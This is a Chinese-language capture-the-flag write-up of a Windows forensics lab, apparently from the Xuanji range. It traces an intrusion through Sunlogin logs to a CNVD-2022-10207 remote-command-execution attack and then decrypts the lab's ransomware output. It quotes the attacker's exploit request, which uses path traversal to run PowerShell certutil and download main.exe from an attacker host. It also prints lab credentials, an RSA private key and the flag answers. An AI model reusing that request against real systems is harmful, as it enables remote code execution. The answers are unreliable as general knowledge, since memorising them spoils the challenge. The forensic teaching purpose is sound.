简介
第四章 windows实战
Administrator xj@123456
flag1
通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为多少,将黑客首次攻击成功的时间为作为 FLAG 提交(2028-03-26 08:11:25.123);
1.获取向日葵日志文件:

然后一个一个进行排查,发现sunlogin_service.20240321-191046文件内容比较多,拖出来进行分析:
先排查一下日志文件中有多少IP地址,每个IP有多少条日志:
1
|
grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' xrk.log | sort | uniq -c
|

1
2
3
4
5
6
7
8
9
10
|
2 0.0.0.0
2 1.1.1.1
4 127.0.0.1
2 127.1.1.1
594 192.168.31.114
1696 192.168.31.45
1 192.168.52.150
1651 47.111.107.239
1660 47.111.169.221
1 47.111.228.106
|
排除掉一些默认地址,然后一个IP一个IP进行查。
发现192.168.31.45有很多恶意的访问路径。
分析下来发现是尝试在利用CNVD-2022-10207:向日葵远程控制软件 RCE 漏洞。
CNVD-2022-10207 漏洞是一种远程命令执行漏洞,存在于向日葵远程控制软件中。攻击者可以通过特制的 HTTP 请求利用此漏洞,执行任意命令或代码。
1
|
grep "192.168.31.45" xrk.log
|

提取时间:
flag
1
|
flag{2024-03-26 10:16:25.585}
|
flag2
通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;
根据flag1,可以看出黑客IP为:192.168.31.45
flag
flag3
通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;
根据日志信息,可以看出:


1
|
192.168.31.45:49329,/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe certutil -urlcache -split -f http://192.168.31.249/main.exe, plugin:check, session:sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1
|
- 恶意活动指示:
- 路径遍历:
/check?cmd=ping....
是一种路径遍历尝试,试图访问系统中的powershell.exe
。
- 命令执行:使用
certutil
工具下载文件 main.exe
。
- 外部IP:下载源
http://192.168.31.249/main.exe
指向一个可能托管恶意程序的外部服务器。
- 恶意程序下载:
- 工具使用:
certutil
是一个合法的Windows工具,但在这里被用于下载恶意文件,这是一个常见的攻击模式。
- 下载目标:目标文件
main.exe
可能是恶意程序。
flag
flag4
找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;
从日志里找一下DEC,看有没有信息

但并没有找到这个文件信息。但是我们看日志,发现一个qq.txt文件。

1
|
2024-03-26 10:39:11.031 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49884, path: /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe echo 647224830 > qq.txt, version: HTTP/1.1
|
搜索QQ群,发现了玄机的靶场群。


找到文件:
使用命令,对文件进行MD5加密

flag
1
|
flag{5ad8d202f80202f6d31e077fc9b0fc6b}
|
flag5
通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;
先使用RSA解到密钥:
Flag4的DEC.pem文件就是rsa的私钥,不过格式需要稍加修改,将Private key改成大写即可
PEM格式密钥:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDWQqpkHRKtRu66MjTrNZC13A6rIlGaJBd/FYBy4ifiITasCnQE
J9aRTIYQsM5iincecnvY8xGYMg5pVTp6P4fxS4/+1bAEciRXSTCmLI8FeDd3sjOc
HTw82sG0hfnnb0b/LFhbOCk7BgLnpwvSy5za/dtVQFSDbQbQuTBp029AKwIDAQAB
AoGBAKh6952NtvgGhQZpIG+sSUSX6/jqHZzFsKw/7idoatBIKcOS3LO/19udfvZ0
8XVPSGfqwjRQvo8dHXP6juc+Odg1XOLPw4fjjJz9b9dLKCKwtIU3CwA1AmuhYNGp
1OXlHLyUaNVTN3TZN9Dn7txD4gOvLIirqbmhzy/N7PdPF5ThAkEA4MB++5DSY7Kv
MO1uHuxTr/jRy6754Mzgo0fpLBXSB13/nLMxRA6QEbigoAFpsFd36EYMKzftbezB
gx2nphvLUwJBAPQMv730MqCWjaCPLgYRV+oMU6OnOMs6+ALql+I1eVqVfBAt+5De
HMxY7mWdaR9pofzuz+6KkmwRHqKSVw45dMkCQFJ68l76B+vkoFxxVe9tRU0YIE4C
mdtA9NOXSWAPZfOkMHFeZZ8XRRHr0q7FtfasMuoAAuk9bhngQCgREvxnyNcCQGnt
trQecHMfpe2Q+CsOEBi4rP0VsiMUP14UsUQwbbIRvD3Rl6WzotBXsXJNtrk5wmPk
zD//ybo6XA+4cSztZ3ECQQC92ck1XJm7V12SOFqHcNXFoS8tFvgNQXNEahmhJ2wb
xTo0VwUhCeG1n8X5PqRn6Rcsh8YQAt924YrWtcTxrg8g
-----END RSA PRIVATE KEY-----
|
要加密的内容

1
|
N2xTZ2Bsn2Y5lve7KZ36bgsFjqncBs55VO0zkeEIr5Iga/kbegA0BAstotBWnZ16+trNfkzl3apUobodMkC8covEo22p+kWAyVjMRyJ98EQ4Pspr/Y5HIuH0xuvPa82j7b0AMJHkyd2viuymI/mrxjJk2X0xlEE4YVioMLd22+w=
|

解密:
然后再AES解密:
需要解密的内容:
1
|
0sWK8adKSGh1Xaxo6n1mZFoyNDYVokXwkBhxnzxU+MEJIV44u48SdOiFzWLn849hObaP6z26lLtMnXaDUnAPuMh+nF2hw9RoAsur7KYxE8/iY/y4jOEBsHT5wvQldcNfntrDyMUCvrWTUHl2yapUmaIIf2rZsNsqMVJ9puZzp58+FJmulyC7R1C2yoP1jHhsdOkU7htbzUWWsm2ybL+eVpXTFC+i6nuEBoAYhv2kjSgL8qKBFsLKmKQSn/ILRPaRYDFP/srEQzF7Y4yZa4cotpFTdGUVU547Eib/EaNuhTyzgOGKjXl2UYxHM/v0c3lgjO7GDA9eF3a/BBXPAgtK126lUfoGK7iSAhduRt5sRP4=
|
密钥:
iv偏移量是16个0

获得答案:
1
2
3
4
5
6
|
@suanve
时间是连续的,年份只是人类虚构出来用于统计的单位,2024年第一天和2023年最后一天,
不会有任何本质区别。你的花呗,你的客户,你的体检报告,窗外的寒风,都不会因为这是新的一年,
而停下对你的毒打。
GIVE YOU FLAG!!!!!
flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}
|
flag
1
|
flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}
|